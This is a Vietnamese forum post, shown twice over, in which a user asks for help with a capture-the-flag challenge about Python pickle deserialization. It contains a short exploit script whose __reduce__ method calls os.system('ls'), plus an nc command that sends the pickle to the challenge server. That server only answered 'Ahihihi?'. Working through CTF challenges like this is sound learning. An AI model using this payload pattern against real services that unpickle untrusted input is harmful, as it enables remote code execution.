learn2hack
Member
-
11/05/2018
-
2
-
17 bài viết
Cho cháu hỏi bài Misc06 trong Play ! 2
Cho cháu hỏi bài Misc06 trong Play ! 2
theo Mô tả và Gợi ý
Pickle
OMG! Pickle again
nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,
cháu viết exploit sau
#!/usr/bin/env python
import pickle
import os
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)
gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server
Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
theo Mô tả và Gợi ý
Pickle
OMG! Pickle again
nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,
cháu viết exploit sau
#!/usr/bin/env python
import pickle
import os
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)
gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server
Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?